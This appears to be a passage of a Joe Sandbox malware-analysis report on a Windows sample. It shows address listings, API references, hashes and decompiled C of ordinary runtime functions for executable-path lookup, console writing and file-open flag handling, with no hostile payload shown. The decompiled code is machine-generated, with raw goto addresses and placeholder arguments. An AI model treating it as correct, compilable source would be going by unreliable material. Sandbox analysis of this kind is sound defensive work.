                                                                                                                                                                                                                              0x7ff735c439f7
                                                                                                                                                                                                                              0x7ff735c439fc
                                                                                                                                                                                                                              0x7ff735c439ff
                                                                                                                                                                                                                              0x7ff735c43a06
                                                                                                                                                                                                                              0x7ff735c43a09
                                                                                                                                                                                                                              0x7ff735c43a1b
                                                                                                                                                                                                                              0x7ff735c43a29
                                                                                                                                                                                                                              0x7ff735c43a39
                                                                                                                                                                                                                              0x7ff735c43a40
                                                                                                                                                                                                                              0x7ff735c43a42
                                                                                                                                                                                                                              0x7ff735c43a50
                                                                                                                                                                                                                              0x7ff735c43a58
                                                                                                                                                                                                                              0x7ff735c43a61
                                                                                                                                                                                                                              0x7ff735c43a68
                                                                                                                                                                                                                              0x7ff735c43a87

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF735C435DC), ref: 00007FF735C43A21
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C426D0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF735C47063,?,?,?,?,?,?,?,?,?,?,?,00007FF735C4101D), ref: 00007FF735C42704
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C426D0: MessageBoxW.USER32 ref: 00007FF735C427DC
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                              • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                              • Opcode ID: 88b38282e1165deaa8451228dd3ea4e28c691806c63a7d35b1be29f1896baad7
                                                                                                                                                                                                                              • Instruction ID: 46400381279df674421db08525471749b4b131e2329f62f78f9c18c2dca70657
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88b38282e1165deaa8451228dd3ea4e28c691806c63a7d35b1be29f1896baad7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 700184A3B18653A1FA62B724E8067B5D252AF98FCCFC41431D84D86686EE1CE244E720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5B0D0 Relevance: 6.3, APIs: 4, Instructions: 305fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 53%
                                                                                                                                                                                                                              			E00007FF77FF735C5B0D0(void* __ecx, signed int __edx, void* __esi, long long __rbx, intOrPtr* __rcx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				intOrPtr _t182;
				signed int _t186;
				signed int _t193;
				signed int _t198;
				void* _t212;
				signed char _t213;
				void* _t229;
				void* _t262;
				signed long long _t263;
				signed long long _t266;
				long long _t268;
				signed long long _t270;
				long long _t275;
				long long _t277;
				long long _t279;
				intOrPtr* _t288;
				intOrPtr _t293;
				long long _t294;
				long long _t317;
				void* _t325;
				long long _t326;
				void* _t327;
				long long _t328;
				intOrPtr* _t329;
				long long _t330;
				signed char* _t331;
				signed char* _t332;
				signed char* _t333;
				intOrPtr* _t334;
				void* _t335;
				void* _t336;
				signed long long _t337;
				intOrPtr _t340;
				signed long long _t342;
				void* _t344;
				intOrPtr* _t346;
				intOrPtr _t350;
				signed long long _t355;
				signed long long _t358;
				signed long long _t360;
				void* _t363;
				long long _t364;
				long long _t366;
				char _t367;
				void* _t371;
				signed char* _t372;
				signed long long _t374;

				_t262 = _t336;
				_t335 = _t262 - 0x57;
				_t337 = _t336 - 0xe0;
				 *((long long*)(_t335 - 9)) = 0xfffffffe;
				 *((long long*)(_t262 + 8)) = __rbx;
				_t263 =  *0x35c7b008; // 0x861d85c91f07
				 *(_t335 + 0x17) = _t263 ^ _t337;
				_t329 = __r8;
				 *((long long*)(_t335 - 0x49)) = __r8;
				_t288 = __rcx;
				_t366 =  *((intOrPtr*)(_t335 + 0x7f));
				 *((long long*)(_t335 - 0x51)) = _t366;
				 *(_t335 - 0x19) = __edx;
				_t266 = __edx >> 6;
				 *(_t335 - 0x59) = _t266;
				 *(_t335 - 0x11) = __edx;
				_t374 = __edx + __edx * 8;
				_t268 =  *((intOrPtr*)( *((intOrPtr*)(0x7ff735c40000 + 0x4aa40 + _t266 * 8)) + 0x28 + _t374 * 8));
				 *((long long*)(_t335 - 0x29)) = _t268;
				r12d = r9d;
				_t364 = _t363 + __r8;
				 *((long long*)(_t335 - 0x71)) = _t364;
				 *((intOrPtr*)(_t335 - 0x61)) = GetConsoleOutputCP();
				if ( *((intOrPtr*)(_t366 + 0x28)) != dil) goto 0x35c5b170;
				E00007FF77FF735C53100(_t268, __rcx, _t366, __r8);
				_t24 = _t366 + 0x18; // 0xcccccccccccccccc
				_t293 =  *_t24;
				r8d =  *(_t293 + 0xc);
				 *(_t335 - 0x5d) = r8d;
				 *_t288 = _t268;
				 *((intOrPtr*)(_t288 + 8)) = 0;
				if ( *((intOrPtr*)(_t335 - 0x49)) - _t364 >= 0) goto 0x35c5b530;
				_t270 = __edx >> 6;
				 *(_t335 - 0x21) = _t270;
				 *((char*)(_t337 + 0x40)) =  *_t329;
				 *((intOrPtr*)(_t335 - 0x7d)) = 0;
				r12d = 1;
				if (r8d != 0xfde9) goto 0x35c5b338;
				_t346 = 0x3e + _t374 * 8 +  *((intOrPtr*)(0x7ff735c40000 + 0x4aa40 + _t270 * 8));
				if ( *_t346 == dil) goto 0x35c5b1ec;
				_t371 = _t328 + 1;
				if (_t371 - 5 < 0) goto 0x35c5b1d9;
				if (_t371 == 0) goto 0x35c5b2ca;
				r12d =  *((char*)(_t293 + 0x7ff735c7b2d0));
				r12d = r12d + 1;
				_t182 = r12d - 1;
				 *((intOrPtr*)(_t335 - 0x69)) = _t182;
				_t340 = _t182;
				if (_t340 -  *((intOrPtr*)(_t335 - 0x71)) - _t329 > 0) goto 0x35c5b49f;
				_t294 = _t328;
				 *((char*)(_t335 + _t294 - 1)) =  *_t346;
				if (_t294 + 1 - _t371 < 0) goto 0x35c5b231;
				if (_t340 <= 0) goto 0x35c5b262;
				E00007FF77FF735C4B150();
				_t317 = _t328;
				 *((intOrPtr*)( *((intOrPtr*)(0x7ff735c40000 + 0x4aa40 +  *(_t335 - 0x59) * 8)) + _t317 + 0x3e + _t374 * 8)) = dil;
				if (_t317 + 1 - _t371 < 0) goto 0x35c5b265;
				 *((long long*)(_t335 - 0x41)) = _t328;
				_t275 = _t335 - 1;
				 *((long long*)(_t335 - 0x39)) = _t275;
				_t186 = (0 | r12d == 0x00000004) + 1;
				r12d = _t186;
				r8d = _t186;
				 *((long long*)(_t337 + 0x20)) = _t366;
				E00007FF77FF735C5EB98(_t275, _t288, _t335 - 0x7d, _t335 - 0x39, _t340, _t335 - 0x41);
				if (_t275 == 0xffffffff) goto 0x35c5b530;
				_t330 = _t329 +  *((intOrPtr*)(_t335 - 0x69)) - 1;
				goto 0x35c5b3cd;
				_t367 =  *((char*)(_t275 + 0x7ff735c7b2d0));
				_t212 = _t367 + 1;
				_t342 =  *((intOrPtr*)(_t335 - 0x71)) - _t330;
				if (_t212 - _t342 > 0) goto 0x35c5b4cd;
				 *((long long*)(_t335 - 0x69)) = _t328;
				 *((long long*)(_t335 - 0x31)) = _t330;
				_t193 = (0 | _t212 == 0x00000004) + 1;
				r14d = _t193;
				r8d = _t193;
				_t277 =  *((intOrPtr*)(_t335 - 0x51));
				 *((long long*)(_t337 + 0x20)) = _t277;
				E00007FF77FF735C5EB98(_t277, _t288, _t335 - 0x7d, _t335 - 0x31, _t342, _t335 - 0x69);
				if (_t277 == 0xffffffff) goto 0x35c5b530;
				_t331 = _t330 + _t367;
				r12d = r14d;
				_t368 =  *((intOrPtr*)(_t335 - 0x51));
				goto 0x35c5b3cd;
				_t358 =  *(_t335 - 0x59);
				_t350 =  *((intOrPtr*)(0x7ff735c40000 + 0x4aa40 + _t358 * 8));
				_t213 =  *(_t350 + 0x3d + _t374 * 8);
				if ((_t213 & 0x00000004) == 0) goto 0x35c5b36f;
				 *((char*)(_t335 + 7)) =  *((intOrPtr*)(_t350 + 0x3e + _t374 * 8));
				 *((char*)(_t335 + 8)) =  *_t331;
				 *(_t350 + 0x3d + _t374 * 8) = _t213 & 0x000000fb;
				r8d = 2;
				goto 0x35c5b3b8;
				r8d =  *_t331 & 0x000000ff;
				_t102 = _t368 + 0x18; // 0xcccccccccccccccc
				if ( *((intOrPtr*)( *((intOrPtr*)( *_t102)) + _t342 * 2)) >= 0) goto 0x35c5b3b2;
				_t372 =  &(_t331[1]);
				if (_t372 -  *((intOrPtr*)(_t335 - 0x71)) >= 0) goto 0x35c5b50b;
				r8d = 2;
				if (E00007FF77FF735C5D240(_t213 & 0x000000fb, _t229, _t288, _t335 - 0x7d, _t331, _t328, _t331, _t335, _t342,  *((intOrPtr*)(_t335 - 0x51))) == 0xffffffff) goto 0x35c5b530;
				_t332 = _t372;
				goto 0x35c5b3cd;
				_t198 = E00007FF77FF735C5D240(_t213 & 0x000000fb, _t229, _t288, _t335 - 0x7d, _t332, _t328, _t332, _t335, _t364,  *((intOrPtr*)(_t335 - 0x51)));
				if (_t198 == 0xffffffff) goto 0x35c5b530;
				_t333 =  &(_t332[1]);
				 *((long long*)(_t337 + 0x38)) = _t328;
				 *((long long*)(_t337 + 0x30)) = _t328;
				 *((intOrPtr*)(_t337 + 0x28)) = 5;
				_t279 = _t335 + 0xf;
				 *((long long*)(_t337 + 0x20)) = _t279;
				r9d = r12d;
				_t344 = _t335 - 0x7d;
				E00007FF77FF735C5E704();
				r14d = _t198;
				if (_t198 == 0) goto 0x35c5b530;
				 *((long long*)(_t337 + 0x20)) = _t328;
				r8d = _t198;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x35c5b528;
				 *((intOrPtr*)(_t288 + 4)) = __esi -  *((intOrPtr*)(_t335 - 0x49)) +  *((intOrPtr*)(_t288 + 8));
				if ( *((intOrPtr*)(_t335 - 0x79)) - r14d < 0) goto 0x35c5b530;
				if ( *((char*)(_t337 + 0x40)) != 0xa) goto 0x35c5b488;
				 *((short*)(_t337 + 0x40)) = 0xd;
				 *((long long*)(_t337 + 0x20)) = _t328;
				_t128 = _t279 - 0xc; // 0x1
				r8d = _t128;
				_t325 = _t337 + 0x40;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x35c5b528;
				if ( *((intOrPtr*)(_t335 - 0x79)) - 1 < 0) goto 0x35c5b530;
				 *((intOrPtr*)(_t288 + 8)) =  *((intOrPtr*)(_t288 + 8)) + 1;
				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) + 1;
				if (_t333 -  *((intOrPtr*)(_t335 - 0x71)) >= 0) goto 0x35c5b530;
				r8d =  *(_t335 - 0x5d);
				goto 0x35c5b19b;
				if (_t325 <= 0) goto 0x35c5b4c8;
				_t334 = _t333 - _t372;
				 *((char*)( *((intOrPtr*)(0x7ff735c40000 + 0x4aa40 + _t358 * 8)) + _t372 + 0x3e + _t374 * 8)) =  *((intOrPtr*)(_t334 + _t372));
				if (1 - _t325 < 0) goto 0x35c5b4a7;
				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) +  *((intOrPtr*)(_t288 + 4));
				goto 0x35c5b530;
				if (_t344 <= 0) goto 0x35c5b505;
				_t326 = _t328;
				_t360 =  *(_t335 - 0x19) >> 6;
				_t355 =  *(_t335 - 0x11) +  *(_t335 - 0x11) * 8;
				 *((char*)( *((intOrPtr*)(0x7ff735c40000 + 0x4aa40 + _t360 * 8)) + _t355 * 8 + _t326 + 0x3e)) =  *((intOrPtr*)(_t326 + _t334));
				_t327 = _t326 + 1;
				if (2 - _t344 < 0) goto 0x35c5b4e5;
				 *((intOrPtr*)(_t288 + 4)) =  *((intOrPtr*)(_t288 + 4)) + r8d;
				goto 0x35c5b530;
				 *((char*)(_t355 + 0x3e + _t374 * 8)) =  *_t334;
				 *( *((intOrPtr*)(0x7ff735c40000 + 0x4aa40 + _t360 * 8)) + 0x3d + _t374 * 8) =  *( *((intOrPtr*)(0x7ff735c40000 + 0x4aa40 + _t360 * 8)) + 0x3d + _t374 * 8) | 0x00000004;
				_t174 = _t327 + 1; // 0x1
				 *((intOrPtr*)(_t288 + 4)) = _t174;
				goto 0x35c5b530;
				 *_t288 = GetLastError();
				return E00007FF77FF735C4A410(_t206,  *((intOrPtr*)(_t335 - 0x61)),  *(_t335 + 0x17) ^ _t337);
			}





















































                                                                                                                                                                                                                              0x7ff735c5b0d0
                                                                                                                                                                                                                              0x7ff735c5b0de
                                                                                                                                                                                                                              0x7ff735c5b0e2
                                                                                                                                                                                                                              0x7ff735c5b0e9
                                                                                                                                                                                                                              0x7ff735c5b0f1
                                                                                                                                                                                                                              0x7ff735c5b0f5
                                                                                                                                                                                                                              0x7ff735c5b0ff
                                                                                                                                                                                                                              0x7ff735c5b103
                                                                                                                                                                                                                              0x7ff735c5b106
                                                                                                                                                                                                                              0x7ff735c5b10d
                                                                                                                                                                                                                              0x7ff735c5b110
                                                                                                                                                                                                                              0x7ff735c5b114
                                                                                                                                                                                                                              0x7ff735c5b11b
                                                                                                                                                                                                                              0x7ff735c5b122
                                                                                                                                                                                                                              0x7ff735c5b126
                                                                                                                                                                                                                              0x7ff735c5b134
                                                                                                                                                                                                                              0x7ff735c5b138
                                                                                                                                                                                                                              0x7ff735c5b144
                                                                                                                                                                                                                              0x7ff735c5b149
                                                                                                                                                                                                                              0x7ff735c5b14d
                                                                                                                                                                                                                              0x7ff735c5b150
                                                                                                                                                                                                                              0x7ff735c5b153
                                                                                                                                                                                                                              0x7ff735c5b15d
                                                                                                                                                                                                                              0x7ff735c5b166
                                                                                                                                                                                                                              0x7ff735c5b16b
                                                                                                                                                                                                                              0x7ff735c5b170
                                                                                                                                                                                                                              0x7ff735c5b170
                                                                                                                                                                                                                              0x7ff735c5b174
                                                                                                                                                                                                                              0x7ff735c5b178
                                                                                                                                                                                                                              0x7ff735c5b17e
                                                                                                                                                                                                                              0x7ff735c5b181
                                                                                                                                                                                                                              0x7ff735c5b188
                                                                                                                                                                                                                              0x7ff735c5b191
                                                                                                                                                                                                                              0x7ff735c5b195
                                                                                                                                                                                                                              0x7ff735c5b19d
                                                                                                                                                                                                                              0x7ff735c5b1a1
                                                                                                                                                                                                                              0x7ff735c5b1a4
                                                                                                                                                                                                                              0x7ff735c5b1b8
                                                                                                                                                                                                                              0x7ff735c5b1d3
                                                                                                                                                                                                                              0x7ff735c5b1dc
                                                                                                                                                                                                                              0x7ff735c5b1e0
                                                                                                                                                                                                                              0x7ff735c5b1ea
                                                                                                                                                                                                                              0x7ff735c5b1ef
                                                                                                                                                                                                                              0x7ff735c5b207
                                                                                                                                                                                                                              0x7ff735c5b210
                                                                                                                                                                                                                              0x7ff735c5b216
                                                                                                                                                                                                                              0x7ff735c5b218
                                                                                                                                                                                                                              0x7ff735c5b222
                                                                                                                                                                                                                              0x7ff735c5b228
                                                                                                                                                                                                                              0x7ff735c5b22e
                                                                                                                                                                                                                              0x7ff735c5b234
                                                                                                                                                                                                                              0x7ff735c5b241
                                                                                                                                                                                                                              0x7ff735c5b246
                                                                                                                                                                                                                              0x7ff735c5b252
                                                                                                                                                                                                                              0x7ff735c5b262
                                                                                                                                                                                                                              0x7ff735c5b270
                                                                                                                                                                                                                              0x7ff735c5b27b
                                                                                                                                                                                                                              0x7ff735c5b27d
                                                                                                                                                                                                                              0x7ff735c5b281
                                                                                                                                                                                                                              0x7ff735c5b285
                                                                                                                                                                                                                              0x7ff735c5b292
                                                                                                                                                                                                                              0x7ff735c5b294
                                                                                                                                                                                                                              0x7ff735c5b297
                                                                                                                                                                                                                              0x7ff735c5b29a
                                                                                                                                                                                                                              0x7ff735c5b2ab
                                                                                                                                                                                                                              0x7ff735c5b2b4
                                                                                                                                                                                                                              0x7ff735c5b2c2
                                                                                                                                                                                                                              0x7ff735c5b2c5
                                                                                                                                                                                                                              0x7ff735c5b2cd
                                                                                                                                                                                                                              0x7ff735c5b2d6
                                                                                                                                                                                                                              0x7ff735c5b2de
                                                                                                                                                                                                                              0x7ff735c5b2e7
                                                                                                                                                                                                                              0x7ff735c5b2ed
                                                                                                                                                                                                                              0x7ff735c5b2f1
                                                                                                                                                                                                                              0x7ff735c5b2fd
                                                                                                                                                                                                                              0x7ff735c5b2ff
                                                                                                                                                                                                                              0x7ff735c5b302
                                                                                                                                                                                                                              0x7ff735c5b305
                                                                                                                                                                                                                              0x7ff735c5b309
                                                                                                                                                                                                                              0x7ff735c5b31a
                                                                                                                                                                                                                              0x7ff735c5b323
                                                                                                                                                                                                                              0x7ff735c5b329
                                                                                                                                                                                                                              0x7ff735c5b32c
                                                                                                                                                                                                                              0x7ff735c5b32f
                                                                                                                                                                                                                              0x7ff735c5b333
                                                                                                                                                                                                                              0x7ff735c5b338
                                                                                                                                                                                                                              0x7ff735c5b33c
                                                                                                                                                                                                                              0x7ff735c5b344
                                                                                                                                                                                                                              0x7ff735c5b34c
                                                                                                                                                                                                                              0x7ff735c5b353
                                                                                                                                                                                                                              0x7ff735c5b358
                                                                                                                                                                                                                              0x7ff735c5b35e
                                                                                                                                                                                                                              0x7ff735c5b363
                                                                                                                                                                                                                              0x7ff735c5b36d
                                                                                                                                                                                                                              0x7ff735c5b36f
                                                                                                                                                                                                                              0x7ff735c5b373
                                                                                                                                                                                                                              0x7ff735c5b37f
                                                                                                                                                                                                                              0x7ff735c5b381
                                                                                                                                                                                                                              0x7ff735c5b389
                                                                                                                                                                                                                              0x7ff735c5b392
                                                                                                                                                                                                                              0x7ff735c5b3a7
                                                                                                                                                                                                                              0x7ff735c5b3ad
                                                                                                                                                                                                                              0x7ff735c5b3b0
                                                                                                                                                                                                                              0x7ff735c5b3bf
                                                                                                                                                                                                                              0x7ff735c5b3c7
                                                                                                                                                                                                                              0x7ff735c5b3cd
                                                                                                                                                                                                                              0x7ff735c5b3d0
                                                                                                                                                                                                                              0x7ff735c5b3d5
                                                                                                                                                                                                                              0x7ff735c5b3da
                                                                                                                                                                                                                              0x7ff735c5b3e2
                                                                                                                                                                                                                              0x7ff735c5b3e6
                                                                                                                                                                                                                              0x7ff735c5b3eb
                                                                                                                                                                                                                              0x7ff735c5b3ee
                                                                                                                                                                                                                              0x7ff735c5b3f7
                                                                                                                                                                                                                              0x7ff735c5b3fc
                                                                                                                                                                                                                              0x7ff735c5b401
                                                                                                                                                                                                                              0x7ff735c5b407
                                                                                                                                                                                                                              0x7ff735c5b410
                                                                                                                                                                                                                              0x7ff735c5b426
                                                                                                                                                                                                                              0x7ff735c5b434
                                                                                                                                                                                                                              0x7ff735c5b43b
                                                                                                                                                                                                                              0x7ff735c5b446
                                                                                                                                                                                                                              0x7ff735c5b44d
                                                                                                                                                                                                                              0x7ff735c5b452
                                                                                                                                                                                                                              0x7ff735c5b45b
                                                                                                                                                                                                                              0x7ff735c5b45b
                                                                                                                                                                                                                              0x7ff735c5b45f
                                                                                                                                                                                                                              0x7ff735c5b46f
                                                                                                                                                                                                                              0x7ff735c5b479
                                                                                                                                                                                                                              0x7ff735c5b47f
                                                                                                                                                                                                                              0x7ff735c5b482
                                                                                                                                                                                                                              0x7ff735c5b48c
                                                                                                                                                                                                                              0x7ff735c5b496
                                                                                                                                                                                                                              0x7ff735c5b49a
                                                                                                                                                                                                                              0x7ff735c5b4a2
                                                                                                                                                                                                                              0x7ff735c5b4a4
                                                                                                                                                                                                                              0x7ff735c5b4b6
                                                                                                                                                                                                                              0x7ff735c5b4c6
                                                                                                                                                                                                                              0x7ff735c5b4c8
                                                                                                                                                                                                                              0x7ff735c5b4cb
                                                                                                                                                                                                                              0x7ff735c5b4d0
                                                                                                                                                                                                                              0x7ff735c5b4d2
                                                                                                                                                                                                                              0x7ff735c5b4d9
                                                                                                                                                                                                                              0x7ff735c5b4e1
                                                                                                                                                                                                                              0x7ff735c5b4f4
                                                                                                                                                                                                                              0x7ff735c5b4fa
                                                                                                                                                                                                                              0x7ff735c5b503
                                                                                                                                                                                                                              0x7ff735c5b505
                                                                                                                                                                                                                              0x7ff735c5b509
                                                                                                                                                                                                                              0x7ff735c5b50d
                                                                                                                                                                                                                              0x7ff735c5b51a
                                                                                                                                                                                                                              0x7ff735c5b520
                                                                                                                                                                                                                              0x7ff735c5b523
                                                                                                                                                                                                                              0x7ff735c5b526
                                                                                                                                                                                                                              0x7ff735c5b52e
                                                                                                                                                                                                                              0x7ff735c5b559

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2718003287-0
                                                                                                                                                                                                                              • Opcode ID: 65275bbdd37509c17356ef48de86f1424d3af239220993010c0c7ee56114211d
                                                                                                                                                                                                                              • Instruction ID: e857de2f1e802276fc526ca560bc6181209c27f77d4e0b20387aff508bd1e06c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 65275bbdd37509c17356ef48de86f1424d3af239220993010c0c7ee56114211d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03D1EF73B08A8799E711DFB6D4402BCBBB1EB04B9CB944621DE4E57B99DE38D406D310
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C64C54 Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                                                                                              			E00007FF77FF735C64C54(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed char* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
				signed int _t43;
				signed int _t55;
				signed int _t57;
				signed int _t73;
				void* _t96;
				signed int _t106;

				_a8 = __rbx;
				_a24 = __rbp;
				 *__rcx = 0;
				r14d = r9d;
				_t73 = __edx;
				if (__eflags == 0) goto 0x35c64cc9;
				if (__eflags == 0) goto 0x35c64ca5;
				if ((__edx & 0x00000003) - 1 == 1) goto 0x35c64c9e;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				E00007FF77FF735C59400();
				goto 0x35c64cce;
				goto 0x35c64cce;
				asm("sbb ecx, ecx");
				goto 0x35c64cce;
				__rcx[4] = 0x80000000;
				_t43 = _t73 & 0x00000700;
				if ((dil & 0x00000008) == 0) goto 0x35c64d3d;
				if (_t43 == 0x100) goto 0x35c64d36;
				if (_t43 == 0x200) goto 0x35c64d2f;
				if (_t43 == 0x300) goto 0x35c64d28;
				if (_t43 == 0x400) goto 0x35c64d3d;
				if (_t43 == 0x500) goto 0x35c64d21;
				if (_t43 == 0x600) goto 0x35c64d2f;
				_t96 = _t43 - 0x700;
				if (_t96 == 0) goto 0x35c64d21;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				E00007FF77FF735C59400();
				goto 0x35c64d42;
				goto 0x35c64d42;
				goto 0x35c64d42;
				goto 0x35c64d42;
				goto 0x35c64d42;
				__rcx[8] = 3;
				if (_t96 == 0) goto 0x35c64d93;
				if (_t96 == 0) goto 0x35c64d8c;
				if (_t96 == 0) goto 0x35c64d85;
				if (_t96 == 0) goto 0x35c64d7e;
				if (r8d - 0xffffffffffffffe0 == 0x40) goto 0x35c64d70;
				E00007FF77FF735C53B18(__rax);
				 *__rax = 0x16;
				E00007FF77FF735C59400();
				goto 0x35c64d95;
				sil = __rcx[4] == 0x80000000;
				goto 0x35c64d95;
				goto 0x35c64d95;
				goto 0x35c64d95;
				goto 0x35c64d95;
				__rcx[0x14] = __rcx[0x14] & 0x00000000;
				__rcx[0xc] = 0;
				__rcx[0x10] = 0x80;
				if (dil >= 0) goto 0x35c64dab;
				 *__rcx =  *__rcx | 0x00000010;
				if ((0x00008000 & _t73) != 0) goto 0x35c64dd3;
				if ((_t73 & 0x00074000) != 0) goto 0x35c64dd0;
				if (E00007FF77FF735C54E4C(__rax,  &_a16) != 0) goto 0x35c64e48;
				if (_a16 == 0x8000) goto 0x35c64dd3;
				 *__rcx =  *__rcx | 0x00000080;
				if ((0x00000100 & _t73) == 0) goto 0x35c64df2;
				_t55 =  *0x35c8b3a8; // 0x0
				_t57 =  !_t55 & r14d;
				if (_t57 < 0) goto 0x35c64df2;
				__rcx[0x10] = 1;
				_t106 = dil & 0x00000040;
				if (_t106 == 0) goto 0x35c64e06;
				asm("bts dword [ebx+0x14], 0x1a");
				asm("bts dword [ebx+0x4], 0x10");
				__rcx[0xc] = __rcx[0xc] | 0x00000004;
				asm("bt edi, 0xc");
				if (_t106 >= 0) goto 0x35c64e0f;
				__rcx[0x10] = __rcx[0x10] | 0x00000100;
				asm("bt edi, 0xd");
				if (_t106 >= 0) goto 0x35c64e1a;
				asm("bts dword [ebx+0x14], 0x19");
				if ((dil & 0x00000020) == 0) goto 0x35c64e27;
				asm("bts dword [ebx+0x14], 0x1b");
				goto 0x35c64e32;
				if ((dil & 0x00000010) == 0) goto 0x35c64e32;
				asm("bts dword [ebx+0x14], 0x1c");
				return _t57;
			}









                                                                                                                                                                                                                              0x7ff735c64c54
                                                                                                                                                                                                                              0x7ff735c64c59
                                                                                                                                                                                                                              0x7ff735c64c69
                                                                                                                                                                                                                              0x7ff735c64c6e
                                                                                                                                                                                                                              0x7ff735c64c74
                                                                                                                                                                                                                              0x7ff735c64c7e
                                                                                                                                                                                                                              0x7ff735c64c83
                                                                                                                                                                                                                              0x7ff735c64c88
                                                                                                                                                                                                                              0x7ff735c64c8a
                                                                                                                                                                                                                              0x7ff735c64c8f
                                                                                                                                                                                                                              0x7ff735c64c95
                                                                                                                                                                                                                              0x7ff735c64c9c
                                                                                                                                                                                                                              0x7ff735c64ca3
                                                                                                                                                                                                                              0x7ff735c64cb9
                                                                                                                                                                                                                              0x7ff735c64cc7
                                                                                                                                                                                                                              0x7ff735c64cd0
                                                                                                                                                                                                                              0x7ff735c64cd8
                                                                                                                                                                                                                              0x7ff735c64cda
                                                                                                                                                                                                                              0x7ff735c64ce1
                                                                                                                                                                                                                              0x7ff735c64ce8
                                                                                                                                                                                                                              0x7ff735c64cef
                                                                                                                                                                                                                              0x7ff735c64cf6
                                                                                                                                                                                                                              0x7ff735c64cfd
                                                                                                                                                                                                                              0x7ff735c64d04
                                                                                                                                                                                                                              0x7ff735c64d06
                                                                                                                                                                                                                              0x7ff735c64d08
                                                                                                                                                                                                                              0x7ff735c64d0a
                                                                                                                                                                                                                              0x7ff735c64d0f
                                                                                                                                                                                                                              0x7ff735c64d15
                                                                                                                                                                                                                              0x7ff735c64d1f
                                                                                                                                                                                                                              0x7ff735c64d26
                                                                                                                                                                                                                              0x7ff735c64d2d
                                                                                                                                                                                                                              0x7ff735c64d34
                                                                                                                                                                                                                              0x7ff735c64d3b
                                                                                                                                                                                                                              0x7ff735c64d42
                                                                                                                                                                                                                              0x7ff735c64d48
                                                                                                                                                                                                                              0x7ff735c64d4d
                                                                                                                                                                                                                              0x7ff735c64d52
                                                                                                                                                                                                                              0x7ff735c64d57
                                                                                                                                                                                                                              0x7ff735c64d5c
                                                                                                                                                                                                                              0x7ff735c64d5e
                                                                                                                                                                                                                              0x7ff735c64d63
                                                                                                                                                                                                                              0x7ff735c64d69
